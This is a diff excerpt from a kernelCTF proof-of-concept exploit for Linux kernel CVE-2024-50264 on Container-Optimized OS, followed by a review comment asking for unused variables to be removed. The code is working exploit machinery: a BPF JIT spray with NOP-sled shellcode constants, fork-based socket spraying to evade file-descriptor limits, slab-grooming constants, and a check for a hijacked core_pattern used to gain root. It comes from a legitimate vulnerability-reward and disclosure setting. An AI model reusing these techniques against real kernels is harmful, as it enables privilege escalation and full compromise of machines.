pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/cos-109-17800.309.84/exploit.c

```diff
@@ -0,0 +1,851 @@
+                char data[];
+        } key;
+};
+
+#define MAIN_CPU 0
+#define HELPER_CPU 1
+
+inline static int _pin_to_cpu(int id)
+{
+        cpu_set_t set;
+        CPU_ZERO(&set);
+        CPU_SET(id, &set);
+        return sched_setaffinity(getpid(), sizeof(set), &set);
+}
+
+unsigned long long get_jiffies()
+{
+	return times(NULL) * 10;
+}
+
+
+int random_in_range(int min, int max)
+{
+	return rand() % (max - min + 1) + min;
+}
+struct sock_filter filter[0x1000];
+char buf[0x1000];
+#define SYSCHK(x)                     \
+	({                                \
+		typeof(x) __res = (x);        \
+		if (__res == (typeof(x))-1)   \
+			err(1, "SYSCHK(" #x ")"); \
+		__res;                        \
+	})
+
+
+int check_core()
+{
+    // Check if /proc/sys/kernel/core_pattern has been overwritten
+    char buf[0x100] = {};
+    int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+    read(core, buf, sizeof(buf));
+    close(core);
+    return strncmp(buf, "|/proc/%P/fd/666 %P", strlen("|/proc/%P/fd/666 %P")) == 0;
+}
+
+int sc()
+{
+	int stopfd[2];
+	SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, stopfd));
+	unsigned int prog_len = 0x900;
+	/* In current environment, the max instructions in a program is near 0x900
+	And we test 0x900 instructions * 0x50 forks * 0x100 sockets * 4 = 180 MB is enough large to spray and worked reliably
+	*/
+	struct sock_filter table[] = {
+		{.code = BPF_LD + BPF_K, .k = 0xb3909090},
+		{.code = BPF_RET + BPF_K, .k = SECCOMP_RET_ALLOW}};
+
+	/* 0xb3909090 is NOPsled shellclode to make exploitation more reliable
+90       nop
+90       nop
+90       nop
+b3 b8    mov    bl, 0xb8
+*/
+	for (int i = 0; i < prog_len; i++)
+		filter[i] = table[0];
+
+	filter[prog_len - 1] = table[1];
+	int idx = prog_len - 2;
+
+#include "sc.h"
+
+	struct sock_fprog prog = {
+		.len = prog_len,
+		.filter = filter,
+	};
+
+	char buffer[0x1000];
+	for (int k = 0; k < 0x50; k++)
+	{
+		if (fork() == 0) // use fork to bypass RLIMIT_NOFILE limit.
+		{
+			int fd[0x100][2];
+			close(stopfd[1]);
+			for (int i = 0; i < 0x100; i++)
+			{
+				SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd[i]));
+				SYSCHK(setsockopt(fd[i][0], SOL_SOCKET,
+								  SO_ATTACH_FILTER, &prog,
+								  sizeof(prog)));
+			}
+			write(stopfd[0], buf, 1);
+			while(*shared_mutex == 0)
+				sleep(1);
+			for (int i = 0; i < 0x100; i++)
+			{
+				// printf("run %d.%d!\n", k, i);
+				if(check_core())
+					exit(0);
+				ssize_t bytes_written = write(fd[i][1], buffer, sizeof(buffer));
+				ssize_t bytes_read = read(fd[i][0], buffer, sizeof(buffer));
+			}
+			read(stopfd[0], buf, 1);
+			// exit(0);
+		}
+	}
+	/* wait for all forks to finish spraying BPF code */
+	read(stopfd[1], buf, 0x50);
+
+	return 0;
+}
+
+int sockets[0x1000];
+
+int sockets_child[0x1000];
+
+#define CC_OVERFLOW_FACTOR 1
+#define OBJS_PER_SLAB 0x2a
+#define CPU_PARTIAL 0x10
+
+#define DRAIN_SLABS_CNT ((CPU_PARTIAL + 1) * CC_OVERFLOW_FACTOR)
+
+union key_payload payload = {};
```

Comment:
These variables seems to be unused. Please remove unused code: https://google.github.io/security-research/kernelctf/style_guide#unused-code